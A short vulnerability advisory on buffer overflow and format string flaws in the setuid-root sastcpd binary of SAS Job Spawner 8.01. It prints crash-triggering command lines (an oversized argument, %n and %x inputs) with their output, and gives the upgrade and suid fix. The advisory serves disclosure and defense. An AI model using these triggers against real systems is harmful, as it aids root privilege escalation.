COMMAND

	sastcpd Buffer Overflow and Format String Vulnerabilities

SYSTEMS AFFECTED

	SAS Job Spawner for Open Systems version 8.01

PROBLEM

	In Digital Shadow advisory [http://www.ministryofpeace.co.uk] :
	

	Since sastcpd is installed uid 0 by default, full  root  privileges  can
	be obtained through exploitation of either of the vulnerabilities  below
	:
	

	

	$ sastcpd `perl -e \"print \'A\' x 1200\"`

	Invalid argument: AAAA[..cut..]AAAA.

	Segmentation fault (core dumped)

	$ ls -la core

	-rw-------  1 root    teknix     1454382 Jan  28 04:22 core

	

	$ sastcpd %n

	Segmentation fault (core dumped)

	

	$ sastcpd %x

	Invalid argument: 2.

	

	

	\"Ellipse\" added :
	

	It appears that the objspawn program included with  the  SAS/Integration
	Technologies product is also vulnerable to these bugs. objspawn is  also
	a setuid root executable  by  default.  See  the  above  link  for  more
	information.

SOLUTION

	SAS Support say that these problems were fixed in version 8.2
	

	http://www.sas.com/service/techsup/unotes/SN/004/004201.html

	

	Also, removing the suid bit seems to solve the problem without  breaking
	the software